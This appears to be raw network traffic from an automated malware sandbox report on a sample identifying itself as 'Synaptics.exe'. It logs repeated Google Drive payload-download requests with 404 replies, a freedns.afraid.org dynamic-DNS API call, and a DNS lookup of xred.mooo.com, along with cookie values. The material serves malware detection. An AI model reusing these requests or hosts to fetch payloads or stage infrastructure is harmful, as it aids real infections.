                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                              Source: global trafficHTTP traffic detected: GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1User-Agent: MyAppHost: freedns.afraid.orgCache-Control: no-cache
                              Source: global trafficDNS traffic detected: DNS query: docs.google.com
                              Source: global trafficDNS traffic detected: DNS query: xred.mooo.com
                              Source: global trafficDNS traffic detected: DNS query: freedns.afraid.org
                              Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7i4MQtD9Ake8Wr9tEyyzKob5HgInf11gkcX8rtRC9q6QwrsjCZgMvIS1LlO2jdfQjeContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:30 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-HvIfQy8YkY4HDxDIZggC9g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=nQ2TbwCw_ds2rWzTR5JkIhluelcY1MRCn-c4_sKdsONDCNospwJyv_xrPNwxBWcQxJh_t8gLmPoB0GrqaOcT2kGisWQMB7I_oTKoKoiThmmpcu7c574eVS0LqYPkHz7iwfqb4ioYh3zYigsn6oOTvDlpPI3vch8zq2ouTiIP1UVQX5HNFuArwxUL; expires=Tue, 01-Jul-2025 10:25:30 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6j55qK_y6oQQV458QiXo80s2gdu4r-lYkJHRlTVUYK3rhSviOGeuHNQw4jgxA-gGnWContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:31 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: script-src 'report-sample' 'nonce-zo98B5bG0X0E5uvAstvLog' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=JrCvw9g0JO-PIdL4Vyh8uXOUt2y1Zfvt6jiAEb0jdF_t2c3S8mdLq5LIOKtJklMX_OujyWE4LrNzFPdfed-9uz58CeGjHTeXeKURwg3XoiTDHwgur-YL6x_jOeCDgHS-vfdUjZq1_CoOelsbNhann97ORn6Okojf9evwpjaeznhUP-cGfOS6hc0; expires=Tue, 01-Jul-2025 10:25:31 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5-FOXmNKMuQEefk0lV_xggA8s9UjUUHEo_C9hOJS_9396nxRl9GegUTMP-jElXBcPcContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:31 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-HC3X_SlqlQs-glgBXh25Hg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerSet-Cookie: NID=520=a_A08qj7AGhwYqYPAOUWBkXuJ3nCaJEFYO5HVpg_5f_J1SpytpXqqhYmA1eULkde7NfijU2zmayf_NNrPC0XAFhoBP3NP0kzjHQ4bF2OTU18bYRtTCWpd_lRmIQiW4WcKJPz9LIuQjeL-zxZJGxrAe8xrIjEX0fLr6U4UULYJOmBGT9tLThE2bOr; expires=Tue, 01-Jul-2025 10:25:31 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6wFw-YHUbq0Ewck829n3g8QC_MvvBjv4Sq0MYzpytkfBfedxnu7iSt4vGiAvYKhitoContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:32 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: script-src 'report-sample' 'nonce-aGM57mpJXpkSbjuhrfRPHg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT; expires=Tue, 01-Jul-2025 10:25:32 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5aEUTcnEip1TUte8B_tHQA0KCILInPpzVd_1xK7cgwoXsSLKf-hOpyichF4Pj20TlY8pNWTkgContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:32 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-ocyzaAViPKhFnLXPxEOjnw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6n9RrkdfXLy-3tZCG04DKjEUv5EEk-7_VYA9oMVMZ8ybZSgUHfTAErIaRUzrJoLDL1AsduCnIContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:33 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-UECtAfVREZOMr9Xn0W_v0g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4RftOGOtjsk7viJeMqoRS6gk8BUHgvfG7UV8-E2cnQ9apP_KnrvZ1lPwX_DWj1Id0Ww-eMjLQContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:35 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-MBY9hWYplAAUay8gls1nnQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7IiSH-ZFQOfXH-hdLXVvGFZ1cZ7K_xQhoseuivSPzoJKXADovJ2aFVOdemTaDbO5bLjAivpWcContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:35 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-gC_pOnxkBAu0myri0oVNqQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4us8661zgyagbC0mWLIzOODq9Rnn2OfJppFtOYC4Cmq4e0A_bOYITLxUi_2_7rLuwTContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:36 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-X6gpngfE8rqYpFEXyynOUA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7kgc9wJ9U2CL61VRVan6sB3ulNEmlb1V0LsEdY_12fOLR3goH7TxYzqaxis1KdesDVZg_RsksContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:36 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-xrzBVyYDrSGlJ749Z-dM7g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4Svs1IQ44jLrISH8rJb7s8T4SlZWS-R13PXjaDXoCTOyaagM4RiCqx_muH0LCereMyContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:37 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'report-sample' 'nonce-T-slwck-Ot-b1gTI18XrUw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4Bb3yM0F_BDOWSWHoUUjLfu9CJc5F4JIuIh4s1rr5LP0qgyB5hNw88zrYY3RxDOD8Yx45XDzQContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:37 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-wMNjJcf-m0qZ0W7xeAzIiQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6zQYTN8bv2zJTprVi6ZRzNdSwpBHX1NGA7GxtypyeKnfxWC32nG54grfxMVlAdad45Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:40 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-IfCEVruc-be_nQ8kd-CYNg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5P3TtdNgmCESfsYsUZ3Usn0AU7rnQMPtkb-CTuZklLm3ZrbYWnoxOUxZf9BDXHAMPIContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:40 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-tpK_-y7RXQiaLrPEOxiMrg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6arkfPGnYGasf2ukpJYMfO6ATQi4y9foiIMnpXv9pIK3h4OZgDzsUyCwSgS4TomXVPContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:41 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-82y_PJ99CVzlFqx5Y97ijQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; 